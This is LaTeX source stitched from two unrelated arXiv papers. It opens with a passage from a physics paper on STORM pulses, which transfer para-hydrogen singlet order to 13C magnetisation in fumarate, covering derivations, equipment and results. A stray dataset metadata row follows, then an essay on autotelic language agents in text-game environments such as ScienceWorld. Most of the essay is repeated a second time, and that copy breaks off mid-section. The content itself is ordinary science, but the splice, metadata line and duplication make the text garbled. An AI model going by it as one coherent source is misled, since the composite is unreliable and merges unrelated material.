and similarly for $\ket{S_{0}\mu^{'}}$. The rotated STZ states thus represent the approximate eigenstates of $\tilde{H}$ and the heteronuclear coupling term $H^{\Delta}_{IS}$ may be considered a perturbation.
\subsection{Para-hydrogen Induced Polarisation}
\label{sec:PHIP}
For typical PHIP experiments involving $I_{2}S$ systems at sufficiently low magnetic fields we may approximate the initial state of the spin ensemble by pure singlet population
\begin{equation}
\begin{aligned}
\rho(0)=\ket{S_{0}}\bra{S_{0}}\otimes \frac{1}{2}\mathds{1}_{S},
\end{aligned}
\end{equation}
where $\mathds{1}_{S}$ represents the unity operator for spin $S$. Because the initial state of the ensemble is rotationally invariant we may express $\rho(0)$ in a straightforward manner in the rotated STZ basis
\begin{equation}
\label{eq:rho0}
\begin{aligned}
\rho(0)=\frac{1}{2}\left(\ket{S_{0}\alpha^{'}}\bra{S_{0}\alpha^{'}}+\ket{S_{0}\beta^{'}}\bra{S_{0}\beta^{'}}\right).
\end{aligned}
\end{equation}
In the absence of $H^{\Delta}_{IS}$ no heteronuclear magnetisation may be extracted out of the system, however the presence of $H^{\Delta}_{IS}$ causes coherent mixing within the manifolds $\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\}$ and $\{\ket{S_{0}\alpha^{'}},\ket{T_{0}\beta^{'}}, \ket{T_{+1}\beta^{'}}\}$.
Strictly speaking these two manifolds are not completely isolated from all other states. But as illustrated in figure \ref{fig:lac} mixing of this type will be efficiently suppressed for our choice of the rotation frequency $\omega_{\rm rot}$. Taking the first manifold for example, one may show to first order in perturbation theory that the following inequalities are well satisfied
\begin{equation}
\label{eq:TLS_cond}
\begin{aligned}
&\vert\bra{T_{-1}\alpha^{'}}\tilde{H}\ket{n}\vert\ll\vert\bra{T_{-1}\alpha^{'}}\tilde{H}\ket{T_{-1}\alpha^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\\
&\vert\bra{T_{0}\alpha^{'}}\tilde{H}\ket{n}\vert\;\;\ll\vert\bra{T_{0}\alpha^{'}}\tilde{H}\ket{T_{0}\alpha^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\\
&\vert\bra{S_{0}\beta^{'}}\tilde{H}\ket{n}\vert\;\;\ll\vert\bra{S_{0}\beta^{'}}\tilde{H}\ket{S_{0}\beta^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\end{aligned}
\end{equation}
where $\ket{n}$ represents any state outside the manifold.
The energy separation between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state is given by
\begin{equation}
\label{eq:delta_E}
\begin{aligned}
\Delta E
=\omega_{\rm eff}^{I}-\omega_{\rm eff}^{S}+2\pi\left(J_{12}-\frac{J_{13}+J_{23}}{4}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})\right).
\end{aligned}
\end{equation}
As a result, coherent state mixing is maximised by choosing an optimised rotation frequency $\omega_\mathrm{STORM}$ such that
\begin{equation}
\begin{aligned}
\Delta E=0 \quad{\rm at}\quad\omega_{\rm rot}=\omega_\mathrm{STORM}.
\end{aligned}
\end{equation}
We refer to such a scenario as the application of a STORM pulse, which causes a degeneracy between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state, and leads to a level anti-crossing (LAC) if the anti-symmetric heteronuclear $J$-couplings are included (see inset figure \ref{fig:lac})~\cite{rodin_representation_2020,messiah_albert_quantum_1962}.
As shown in the appendix
mixing between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state occurs with frequency
\begin{equation}
\label{eq:wSTnut}
\begin{aligned}
\omega_{ST}^{\rm nut}
=&\sqrt{2}\pi\cos^{2}(\tfrac{1}{2}(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S}))
\\
\times&(\cos(\xi_{\rm ST})(J_{13}+J_{23})+\sin(\xi_{\rm ST})(J_{13}-J_{23})),
\end{aligned}
\end{equation}
where $\xi_{\rm ST}$ represents the mixing angle between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{0}\beta^{'}}$ state
\begin{equation}
\label{eq:xiST}
\begin{aligned}
\xi_{\rm ST}=\frac{1}{2}\arctantwo(-\frac{J_{12}}{2},\frac{J_{13}-J_{23}}{4} \cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})).
\end{aligned}
\end{equation}
Application of a rotating magnetic field with \mbox{$\omega_{\rm rot}=\omega_\mathrm{STORM}$} causes the states $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ to approximately follow the dynamics of a two-level system (TLS).
Consider now starting from the density operator in equation \ref{eq:rho0}. The spin-state populations at time $\tau$ under the TLS approximation are given by~\cite{messiah_albert_quantum_1962}
\begin{align}
\label{eq:oscil}
&\bra{S_0\beta^{'}}\,\rho(\tau)\,\ket{S_0\beta^{'}} \simeq
\tfrac{1}{2}\left(1 + \cos(\omega_{ST}^\mathrm{nut} \tau)
\right),
\nonumber\\
&\bra{T_{-1}\alpha^{'}}\,\rho(\tau)\,\ket{T_{-1}\alpha^{'}} \simeq
\tfrac{1}{2}\left(1 - \cos(\omega_{ST}^\mathrm{nut} \tau)
\right).
\end{align}
A complete population inversion between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state may be achieved by applying the STORM pulse for a duration $\tau^{*}=\pi/\omega_{ST}^\mathrm{nut}$. Since the STORM pulse is only resonant with the $\ket{S_{0}\beta^{'}}\leftrightarrow\ket{T_{-1}\alpha^{'}}$ transition all other states experience negligible evolution. The idealised density operator after such a STORM pulse is thus given by
\begin{equation}
\begin{aligned}
\rho(\tau^{*})
\simeq&\frac{1}{2}\left(\ket{S_{0}\alpha^{'}}\bra{S_{0}\alpha^{'}}+\ket{T_{-1}\alpha^{'}}\bra{T_{-1}\alpha^{'}}\right)
\\
=&\mathds{1}/8+\cos(\theta_{\rm eff}^{S}) S_{z}/4+{\rm orth.}\;{\rm operators},
\end{aligned}
\end{equation}
which indicates the generation of heteronuclear $S$ spin magnetisation proportional to $\cos(\theta_{\rm eff}^{S})$.
The state of the $S$ spins may be extracted by tracing over the $I$ spins of the system
\begin{equation}
\begin{aligned}
\rho_{S}(\tau^{*})={\rm Tr}_{I}\{\rho(\tau^{*})\}=&\mathds{1}/2+\cos(\theta_{\rm eff}^{S}) S_{z}.
\end{aligned}
\end{equation}
As a result, the heteronuclear spins become fully polarised as $\cos(\theta_{\rm eff}^{S})$ approaches unity. Representing the transfer amplitude in a slightly more intuitive form:
\begin{equation}
\begin{aligned}
\cos(\theta_{\rm eff}^{S})=\frac{\omega^{S}_{0}+\omega_{\rm rot}}{\sqrt{(\omega^{S}_{1})^{2}+(\omega^{S}_{0}+\omega_{\rm rot})^{2}}},
\end{aligned}
\end{equation}
one may see that this condition is met if the sum of the bias $S$ spin Larmor frequency and angular rotation frequency exceed the $S$ spin nutation frequency ($\vert\omega^{S}_{0}+\omega_{\rm rot}\vert\gg\vert\omega^{S}_{1}\vert$).
Although much of the discussion above has focused on the $\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\}$ manifold, similar results hold for the $\{\ket{S_{0}\alpha^{'}},\ket{T_{0}\beta^{'}}, \ket{T_{+1}\beta^{'}}\}$ manifold, only difference being that the relevant energy difference has to be replaced by
\begin{equation}
\begin{aligned}
\Delta E_{(-)}
&=\omega_{\rm eff}^{I}-\omega_{\rm eff}^{S}-2\pi\left(J_{12}-\frac{J_{13}+J_{23}}{4}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})\right),
\end{aligned}
\end{equation}
where the $(-)$ indicates that this transition will generally lead to negative heteronuclear magnetisation.
\section{\label{sec:Methods}Methods}
\subsection{\label{sec:Materials}Materials}
The precursor solution for fumarate was prepared by dissolving 100~mM disodium acetylene dicarboxylate, 100~mM sodium sulfite, and 6~mM $\mathrm{[RuCp^\ast(MeCN)_3]PF_6}$\xspace (CAS number: 99604-67-8) in D$_2$O, heating to 60\ensuremath{{}^{\circ}\mathrm{C}}\xspace, and passing through a Millex\textregistered\ 0.22~$\mu$m PES filter.
\emph{Para}\xspace-hydrogen was produced by passing hydrogen gas over an iron oxide catalyst packed in a 1/4 inch stainless steel tube cooled by liquid nitrogen which results in \emph{para}\xspace-enrichment level of 50\%.
About 2\% of the fumarate molecules contain a naturally-occurring \ensuremath{{}^{13}\mathrm{C}}\xspace nucleus. The two \ensuremath{{}^{1}\mathrm{H}}\xspace nuclei and the \ensuremath{{}^{13}\mathrm{C}}\xspace nucleus form a three-spin-1/2 system of the type discussed above. The $J$-coupling parameters for the molecular system are consistent with reference~\citenum{bengs_robust_2020,dagys_low-frequency_2021}.
\subsection{\label{sec:Equipment}Equipment}
\input{Figures/Setup}
A sketch of the equipment is shown in figure~\ref{fig:setup}.
The hydrogen gas is bubbled through the solution using a 1/16 inch PEEK capillary tube inserted inside a thin-walled Norell\textregistered\ pressure NMR tube. The Arduino Mega 2560 micro-controller board was used to actuate the Rheodyne MXP injection valves as well as a power switch connected to the solenoid coil. The 50~cm long and 15~mm wide coil was designed to provide a 170~$\mu$T field piercing through the TwinLeaf~MS-4 mu-metal shield. The rotating magnetic field was generated by two 30~cm long orthogonal saddle coils using a Keysight 33500B waveform generator with two channels synchronised with phase difference of $\pm90^\circ$.
The bias field was generated by the built-in Helmholtz coil of the Twinleaf shield, powered by a Keithley 6200 DC current source.
\subsection{\label{sec:Procedure}Experimental Procedure}
Figure~\ref{fig:sequence} gives an overview of the experimental protocol including the magnetic field experienced by the sample as a function of time. Each experiment starts by heating 250\ensuremath{\,\mu\mathrm{L}}\xspace of the sample mixture to $\sim90 \ensuremath{{}^{\circ}\mathrm{C}}\xspace$ in the ambient magnetic field of the laboratory ($\sim$ 110~$\mu$T), followed by insertion into the magnetic shield where a solenoid coil generates a magnetic field of similar magnitude. \emph{Para}\xspace-enriched hydrogen gas is bubbled through the solution at 6 bar pressure for 30~seconds. The rotating field is generated constantly by the waveform generator, the amplitude is kept constant ($B_{\rm STORM}=4\ensuremath{\,\mu\mathrm{T}}\xspace$). The solenoid is switched off by a relay for a period $\tau$ to pre-set the bias field ($B_\mathrm{bias}$) and to mimic a STORM pulse. Afterwards the sample was removed manually and inserted into the Oxford 400~MHz magnet equipped with a Bruker Avance Neo spectrometer.
\input{Figures/Sequence}
The \ensuremath{{}^{13}\mathrm{C}}\xspace free-induction decays were initiated by a hard pulse of 14.7~kHz rf amplitude and recorded with 65~k point density at a spectral width of ~200~ppm. Additional \ensuremath{{}^{1}\mathrm{H}}\xspace decoupling was used for all experiments. Thermal equilibrium \ensuremath{{}^{13}\mathrm{C}}\xspace spectra were recorded at room temperature with a recycle delay of 120~s, averaging the signal over 512 transients.
\section{\label{sec:results}Results}
Figure~\ref{fig:spectra} shows single-transient hyperpolarized \ensuremath{{}^{13}\mathrm{C}}\xspace NMR spectra, obtained using the STORM procedure as a function of the rotational direction in the presence of a 0~T bias field (figure~\ref{fig:spectra}(a)) and a 2~$\mu$T bias field (figure~\ref{fig:spectra}(b)). In both cases the STORM pulse duration was set to 0.2~s with a peak amplitude of $B_{\rm STORM}=4~\mu$T. The rotation frequencies, 1150 Hz for (a) and 223 Hz for (b), correspond to the root of the equation~\ref{eq:delta_E}.
The observed \ensuremath{{}^{13}\mathrm{C}}\xspace polarization levels clearly depend upon the sense of rotation. At zero field the relevant LAC conditions for positive and negative \ensuremath{{}^{13}\mathrm{C}}\xspace magnetization are centred symmetrically around a zero rotation frequency. A simple inversion of the rotation frequency therefore enables selection of either positive and negative \ensuremath{{}^{13}\mathrm{C}}\xspace magnetization.
In the presence of a non-vanishing bias field the symmetry with respect to the rotation frequency is broken. This means that a single frequency can only match one condition and no signal is observed when the rotation is reversed (see Fig.~\ref{fig:spectra}(b)).
\input{Figures/Spectra}
\input{Figures/ZF_profiles}
\input{Figures/Profiles}
The solid black line in figure~\ref{fig:spectra}(a) represents a reference \ensuremath{{}^{13}\mathrm{C}}\xspace spectrum averaged over 512 transients. The spectrum was obtained on the hydrogenated sample after thermal equilibration. Comparison of these spectra allows an estimation of the \ensuremath{{}^{13}\mathrm{C}}\xspace polarization levels, which in this case corresponds to $p^{S}_{z}\simeq6\%$. These results are comparable with previous methods under similar experimental conditions.~\cite{eills_polarization_2019,rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,dagys_low-frequency_2021} Significant improvements in the polarisation are expected by addressing few aspects of the setup. Fully enriched \emph{para}\xspace-hydrogen would lead to 3-fold enhancement, whereas careful optimization of the reaction conditions would further lead to a better polarization yield\cite{eills_polarization_2019,rodin_constant-adiabaticity_2021}. Some minimal losses could be also avoided by using a fully automated experimental procedure.
Integrated \ensuremath{{}^{13}\mathrm{C}}\xspace signal amplitudes as a function of the rotation frequency and the STORM pulse duration $\tau$ at bias field of 0~T and 2~$\mu$T are shown in figures~\ref{fig:zf_profiles}~and~\ref{fig:profiles}. Each experimental point was obtained from a separate experiment on a fresh sample. The experimental data has been normalised to unity to enable a qualitative comparison with numerical simulations and analytically derived curves based on equation~\ref{eq:oscil}. The agreement between both curves and the experimental data is gratifying.
The frequency profiles obtained at different bias fields display a significant change in their width.
At zero-field the full width at half maximum of the profile was estimated to be $\sim$350~Hz whereas at 2~$\mu$T bias field width got reduced to $\sim$5~Hz.
These matching conditions are much broader than the 0.4~Hz width observed in the profiles using the WOLF method~\cite{dagys_low-frequency_2021}. In agreement with the analytic expression given by equation~\ref{eq:wSTnut}, the polarisation transfer rate did not vary dramatically with an increase in the bias field. For both cases, equation~\ref{eq:wSTnut} correctly predicts the polarisation transfer rate to be approximately $\sim 2$~Hz, where we have used the \textit{J}-coupling parameters of fumarate given in refs~\citenum{bengs_robust_2020,dagys_low-frequency_2021}.
\section{Conclusions}
In this work we have studied the polarization transfer from singlet order to heteronuclear magnetization in the context of \emph{para}\xspace-hydrogen induced polarisation. The polarisation transfer is achieved through a combination of a rotating magnetic field and a small bias field.
Despite low values of the static bias field, the rotation frequency needed to drive the transfer is strikingly large. However, the principle of the method described here is rather intuitive and a simple explanation may be given within the framework of level-anti crossings, at least when the Hamiltonian is expressed within the interaction frame of the rotating magnetic field. Based on the LAC picture we were able to establish the resonance conditions for singlet-triplet mixing and determine the corresponding population transfer rate. In particular, we have shown that the rotational direction plays an important role in correctly establishing the resonance condition, and should be chosen carefully in the experimental context.
There are other methods to convert nuclear singlet order into heteronuclear polarization, including resonant pulse schemes in high field as well as magnetic field-cycling at low magnetic fields~\cite{johannesson_transfer_2004,theis_microtesla_2015,theis_light-sabre_2014,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,cavallari_effects_2015,eills_polarization_2019,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021,bengs_robust_2020}. The STORM method introduced here is conceptually simple and \blue{provides a few advantages} over other existing low field methods. The potential polarization losses caused by additional relaxation effects in high magnetic fields are entirely avoided with use of low magnetic fields~\cite{rodin_constant-adiabaticity_2021-1,knecht_mechanism_2018, knecht_indirect_2019}. \blue{However, at ultra-low fields quadrupolar nuclei such as $^2$H or $^{14}$N often act as polarization sinks, and may lead to a significant drops in the polarization transfer efficiency.}
\blue{The presence of quadrupolar nuclei is expected to be particularly disrupting to adiabatic field sweep methods, some of which are routinely utilised in the generation of hyperpolarised \mbox{(1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate}~\cite{rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021}.}
\blue{In contrast to field sweep methods, the STORM method allows one to freely select the strength of magnetic fields as well as the rotation frequency.} \blue{It is thus conceivable that optimal conditions for the magnetic field strength and rotation frequency exist at which the $^2$H or $^{14}$N spins do not interfere with the polarisation transfer process.}
We therefore believe that STORM pulses represent promising candidates for a new class of quadrupolar decoupled polarization transfer methods in the near future. Applications to other hyperpolarization techniques such as PHIP-SABRE (Signal Amplification by Reversible Exchange) are also conceivable~\cite{adams_reversible_2009,theis_light-sabre_2014,theis_microtesla_2015,knecht_mechanism_2018}.
\section*{Conflicts of interest}
There are no conflicts to declare.
\section*{Acknowledgements}
We acknowledge funding received by the Marie Skłodowska-Curie program of the European Union (grant number 766402), the European Research Council (grant 786707-FunMagResBeacons), and EPSRC-UK (grants EP/P009980/1, EP/P030491/1, EP/V055593/1). We thank Malcolm H. Levitt for valuable input and support during preparation of the manuscript.
\section*{Appendix}
\label{app:STORMnut}
\subsection*{STORM nutation frequency}
Consider the manifold defined by
\begin{equation}
\begin{aligned}
V_{1}=\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\},
\end{aligned}
\end{equation}
the argument is analogous for the other manifold. The matrix representation of $\tilde{H}$ restricted to $V_{1}$ manifold is of the following form
\begin{strip}
\begin{equation}
\begin{aligned}
{[}\tilde{H}{]}_{V_{1}}=
\left[\begin{array}{ccc}
-\frac{1}{2}(\omega_{\rm eff}^{S}+3\pi J_{12})
& \frac{\pi}{2}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})(J_{13}-J_{23})
&
\blacksquare
\\
\frac{\pi}{2}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})(J_{13}-J_{23}) & -\frac{1}{2}(\omega_{\rm eff}^{S}-\pi J_{12})
&
\blacksquare
\\
\blacksquare
&
\blacksquare
&
\blacksquare
\end{array}\right],
\end{aligned}
\end{equation}
\end{strip}
where the black squares indicate non-zero, but irrelevant matrix elements.
The energy separation between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{0}\beta^{'}}$ state equals $\vert2\pi J_{12}\vert$ and is not quite sufficient to perform a TLS approximation. We thus diagonalise the corresponding subspace making use of the mixing angle
\begin{equation}
\begin{aligned}
\xi_{\rm ST}=\frac{1}{2}\arctantwo(-\frac{J_{12}}{2},\frac{J_{13}-J_{23}}{4} \cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})).
\end{aligned}
\end{equation}
After the diagonalisation process the matrix representation of $\tilde{H}$ takes the form
\begin{strip}
\begin{equation}
\begin{aligned}
{[}\tilde{H}{]}_{V_{1}}=
\left[\begin{array}{ccc}
\blacksquare
& 0
&
\frac{1}{2}\omega_{ST}^\mathrm{nut}
\\
0
&
\blacksquare
&
\blacksquare
\\
\frac{1}{2}\omega_{ST}^\mathrm{nut}
&
\blacksquare
&
\blacksquare
\end{array}\right]\xrightarrow{\rm TLS\; approximation}\left[\begin{array}{cc}
\blacksquare
&
\frac{1}{2}\omega_{ST}^\mathrm{nut}
\\
\frac{1}{2}\omega_{ST}^\mathrm{nut}
&
\blacksquare
\end{array}\right],
\end{aligned}
\end{equation}
\end{strip}
where $\omega_{ST}^\mathrm{nut}$ is given by equation \ref{eq:wSTnut}.
\clearpage
| 2024-02-18T23:40:02.583Z | 2022-02-10T02:26:47.000Z | algebraic_stack_train_0000 | 1,163 | 4,982 |
|
proofpile-arXiv_065-5848 | \section{A bridge between autotelic agents and text environments}
The main point of this essay is the relevance of studying language autotelic agents in textual environments \cite{cote2018textworld, hausknecht2020interactive, wang2022scienceworld}, both for testing exploration methods in a context that is at once simple experimentally and rich from the perspective of environment interactions; and for transferring the skills of general-purpose agents trained to explore in an autonomous way to the predefined tasks of textual environment benchmarks. We identify three key properties, plus one additional benefit, of text worlds:
\vspace{5pt}
\mypara \textbf{Depth of learnable skills:} skills learnable in the world should involve multiple low-level actions and be nested, such that mastering one skill opens up the possibility of mastering more complex skills. Interactive fiction (IF) \cite{hausknecht2020interactive} games usually feature an entire narrative and extensive maps, such that navigating and passing obstacles requires many successful actions (and subgoals) to be completed. While the original TextWorld levels were not as deep as would be desirable, other non-IF text worlds such as ScienceWorld feature nested repertoires of skills (such as learning to navigate to learn to grow plants to learn the rules of Mendelian genomics);
\mypara \textbf{Breadth of the world:} there should be many paths to explore in the environment; this ensures that we train agents that are able to follow a wide diversity of possible goals, instead of learning to achieve goals along a linear path. This allows us to study generally-capable agents. Some IF games are very linear, having a clear progression from start to finish (e.g., \href{https://ifdb.org/viewgame?id=tqvambr6vowym20v}{Acorn Court}, \href{https://ifdb.org/viewgame?id=1po9rgq2xssupefw}{Detective}; others have huge maps that an agent has to explore before it can progress in the quest (e.g., \href{https://ifdb.org/viewgame?id=0dbnusxunq7fw5ro}{Zork}, \href{https://ifdb.org/viewgame?id=ouv80gvsl32xlion}{Hitchhiker's Guide to the Galaxy}). Exploration heuristics are a part of some successful methods for playing IF with RL \cite{yao2020keep}. ScienceWorld \cite{wang2022scienceworld} has an underlying physical engine allowing for a combinatorial explosion of possibilities like making new objects, combining existing objects, changing states of matter, etc.
\mypara \textbf{Niches of progress}: real-world environments have both easy skills and unlearnable skills. Our simulated environments should mimic this property to test the agent's ability to focus only on highly learnable parts of the space and avoid spending effort on uncontrollable aspects of the environment. In textual environments, high depth implies that some skills are much more learnable than others, already implementing some progress niches. The combinatorial property of language goals allows us to define many unfeasible goals, goals that an autotelic agent has to avoid spending too many resources on.
\mypara \textbf{Language representation for goals:} a language-conditioned agent has to learn to ground its goal representation in its environment \cite{harnad1990symbol, hill2020grounded}, to know when a given observation or sequence of observations satisfies a given goal, or to know what goals were achieved in a given trajectory. This grounding is made much simpler in environments with a single modality; relating language goals to language observations is simpler than grounding language in pixels or image embeddings. This allows us to study language-based exploration in a simpler context.
\vspace{5pt}
\setcounter{para}{0}
\section{Drivers of exploration in autotelic agents}
We identify three main drivers of exploration in autotelic agents. Environments we use should support exploration algorithms that implement these principles; the resulting agents then have a chance to acquire a diverse set of skills that can be repurposed for solving the benchmarks proposed by textual environments.
\vspace{5pt}
\mypara \textbf{Goal self-curriculum:} automatic goal selection \cite{portelas2020automatic} allows the agent to refine its skills on the edge of what it currently masters. Among metrics used to select goals are novelty/surprise of a goal \cite{tam2022semantic, burda2018exploration}, intermediate competence on goals \cite{campero2020learning}, ensemble disagreement \cite{pathak2019self}, or (absolute) learning progress \cite{colas2019curious}. Progress niches in textual environments support such goal curriculum;
\mypara \textbf{Additional exploration after goal achievement:} after achieving a given goal, the agent continue to run for a time to push the boundary of explored space \cite{ecoffet2021first}. The depth of text worlds makes goal chaining relevant, such that an agent that has achieved a known goal can imagine additional goals to pursue. Random exploration can also be used once a known goal has been achieved. Agents exploring in textual environments and choosing uniformly among the set of valid actions in a given state have a high chance of effecting meaningful changes in the environment, making discovery of new skills probable. This property is relevant in any environment with high depth, and both IF and ScienceWorld fit this description.
\mypara \textbf{Goal composition:} as mentioned above, this means using the compositionality afforded by language goals to imagine novel goals in the environment \cite{colas2020language}. Goal-chaining is an example of composition, but language offers many other composition possibilities, such as recombining known verbs, nouns and attributes in novel ways, or making analogies. This is relevant if there exists some transfer between the skills required to accomplish similar goal constructions (e.g., picking up an apple and picking up a carrot requires very similar actions if both are in the kitchen). This is at least partially true in textual environments where objects of the same type usually have similar affordances.
\vspace{5pt}
\section{Challenges for autotelic textual agents}
\setcounter{para}{0}
Text worlds bring a set of unique challenges for autotelic agents, among which we foresee:
\mypara The goal space can be very large. An agent with a limited training budget needs to focus on a subset of the goal space, possibly discovering only a fraction of what is discoverable within the environment. This calls for finer goal-sampling approaches that encourage the agent at making the most out of its allocated time to explore the environment. In addition, we need better methods to push the agent's exploration towards certain parts of the space (e.g., warm-starting the replay buffer with existing trajectories, providing linguistic common-sense knowledge);
\mypara The action space is also very large in textual environments, making exploration (especially methods based on random action selection) potentially challenging.
\mypara Agents must be trajectory-efficient for a given goal; complex goals might be seen only once;
\mypara Catastrophic forgetting needs to be alleviated, so that learning to achieve new goals does not impair the skills learned previously;
\mypara Partial observability means that agent architectures need to include some form of memory.
\vspace{5pt}
Agents trained in such environments will learn a form of language use, not by predicting the most likely sequence of words from a large-scale dataset \cite{Radford2018ImprovingLU, brown2020language} but by learning to use it pragmatically to effect changes in the environment. Of course, the limits of the autotelic agent's world will mean the limits of its language; an interesting development is to build agents that explore textual environments to refine external linguistic knowledge provided by a pretrained language model. This external knowledge repository can be seen as culturally-accumulated common sense, a perspective that is related to so-called Vygotskian AI \cite{colas:tel-03337625} in which a developmental agent learns by interacting with an external social partner that imparts outside language knowledge and organizes the world so as to facilitate the autotelic agent's exploration.
\vspace{5pt}
To conclude, textual environments are ideal testbeds for autotelic language-conditioned agents, and conversely such agents can bring progress on text world benchmarks. There is also promise in the interaction between exploratory agents and large language models encoding exterior linguistic knowledge. Preliminary steps have been taken in this direction \cite{madotto2020exploration} but the full breadth of drivers of exploration we identify has yet to be studied. We hope to foster discussion, define concrete implementations and identify challenges by bringing together the developmental perspective on AI and the textual environment community.
\section{A bridge between autotelic agents and text environments}
The main point of this essay is the relevance of studying language autotelic agents in textual environments \cite{cote2018textworld, hausknecht2020interactive, wang2022scienceworld}, both for testing exploration methods in a context that is at once simple experimentally and rich from the perspective of environment interactions; and for transferring the skills of general-purpose agents trained to explore in an autonomous way to the predefined tasks of textual environment benchmarks. We identify three key properties, plus one additional benefit, of text worlds:
\vspace{5pt}
\mypara \textbf{Depth of learnable skills:} skills learnable in the world should involve multiple low-level actions and be nested, such that mastering one skill opens up the possibility of mastering more complex skills. Interactive fiction (IF) \cite{hausknecht2020interactive} games usually feature an entire narrative and extensive maps, such that navigating and passing obstacles requires many successful actions (and subgoals) to be completed. While the original TextWorld levels were not as deep as would be desirable, other non-IF text worlds such as ScienceWorld feature nested repertoires of skills (such as learning to navigate to learn to grow plants to learn the rules of Mendelian genomics);
\mypara \textbf{Breadth of the world:} there should be many paths to explore in the environment; this ensures that we train agents that are able to follow a wide diversity of possible goals, instead of learning to achieve goals along a linear path. This allows us to study generally-capable agents. Some IF games are very linear, having a clear progression from start to finish (e.g., \href{https://ifdb.org/viewgame?id=tqvambr6vowym20v}{Acorn Court}, \href{https://ifdb.org/viewgame?id=1po9rgq2xssupefw}{Detective}; others have huge maps that an agent has to explore before it can progress in the quest (e.g., \href{https://ifdb.org/viewgame?id=0dbnusxunq7fw5ro}{Zork}, \href{https://ifdb.org/viewgame?id=ouv80gvsl32xlion}{Hitchhiker's Guide to the Galaxy}). Exploration heuristics are a part of some successful methods for playing IF with RL \cite{yao2020keep}. ScienceWorld \cite{wang2022scienceworld} has an underlying physical engine allowing for a combinatorial explosion of possibilities like making new objects, combining existing objects, changing states of matter, etc.
\mypara \textbf{Niches of progress}: real-world environments have both easy skills and unlearnable skills. Our simulated environments should mimic this property to test the agent's ability to focus only on highly learnable parts of the space and avoid spending effort on uncontrollable aspects of the environment. In textual environments, high depth implies that some skills are much more learnable than others, already implementing some progress niches. The combinatorial property of language goals allows us to define many unfeasible goals, goals that an autotelic agent has to avoid spending too many resources on.
\mypara \textbf{Language representation for goals:} a language-conditioned agent has to learn to ground its goal representation in its environment \cite{harnad1990symbol, hill2020grounded}, to know when a given observation or sequence of observations satisfies a given goal, or to know what goals were achieved in a given trajectory. This grounding is made much simpler in environments with a single modality; relating language goals to language observations is simpler than grounding language in pixels or image embeddings. This allows us to study language-based exploration in a simpler context.
\vspace{5pt}
\setcounter{para}{0}
\section{Drivers of exploration in autotelic agents}
We identify three main drivers of exploration in autotelic agents. Environments we use should support exploration algorithms that implement these principles; the resulting agents then have a chance to acquire a diverse set of skills that can be repurposed for solving the benchmarks proposed by textual environments.
\vspace{5pt}
\mypara \textbf{Goal self-curriculum:} automatic goal selection \cite{portelas2020automatic} allows the agent to refine its skills on the edge of what it currently masters. Among metrics used to select goals are novelty/surprise of a goal \cite{tam2022semantic, burda2018exploration}, intermediate competence on goals \cite{campero2020learning}, ensemble disagreement \cite{pathak2019self}, or (absolute) learning progress \cite{colas2019curious}. Progress niches in textual environments support such goal curriculum;
\mypara \textbf{Additional exploration after goal achievement:} after achieving a given goal, the agent continue to run for a time to push the boundary of explored space \cite{ecoffet2021first}. The depth of text worlds makes goal chaining relevant, such that an agent that has achieved a known goal can imagine additional goals to pursue. Random exploration can also be used once a known goal has been achieved. Agents exploring in textual environments and choosing uniformly among the set of valid actions in a given state have a high chance of effecting meaningful changes in the environment, making discovery of new skills probable. This property is relevant in any environment with high depth, and both IF and ScienceWorld fit this description.
\mypara \textbf{Goal composition:} as mentioned above, this means using the compositionality afforded by language goals to imagine novel goals in the environment \cite{colas2020language}. Goal-chaining is an example of composition, but language offers many other composition possibilities, such as recombining known verbs, nouns and attributes in novel ways, or making analogies. This is relevant if there exists some transfer between the skills required to accomplish similar goal constructions (e.g., picking up an apple and picking up a carrot requires very similar actions if both are in the kitchen). This is at least partially true in textual environments where objects of the same type usually have similar affordances.
\vspace{5pt}
\section{Challenges for autotelic textual agents}
\setcounter{para}{0}
Text worlds bring a set of unique challenges for autotelic agents, among which we foresee:
\mypara The goal space can be very large. An agent with a limited training budget needs to focus on a subset of the goal space, possibly discovering only a fraction of what is discoverable within the environment. This calls for finer goal-sampling approaches that encourage the agent at making the most out of its allocated time to explore the environment. In addition, we need better methods to push the agent's exploration towards certain parts of the space (e.g., warm-starting the replay buffer with existing trajectories, providing linguistic common-sense knowledge);
\mypara The action space is also very large in textual environments, making exploration (especially methods based on random action selection) potentially challenging.
\mypara Agents must be trajectory-efficient for a given goal; complex goals might be seen only once;
\mypara Catastrophic forgetting needs to be alleviated, so that learning to achieve new goals does not impair the skills learned previously;
\mypara Partial observability means that agent architectures need to include some form of memory.
\vspace{5pt}
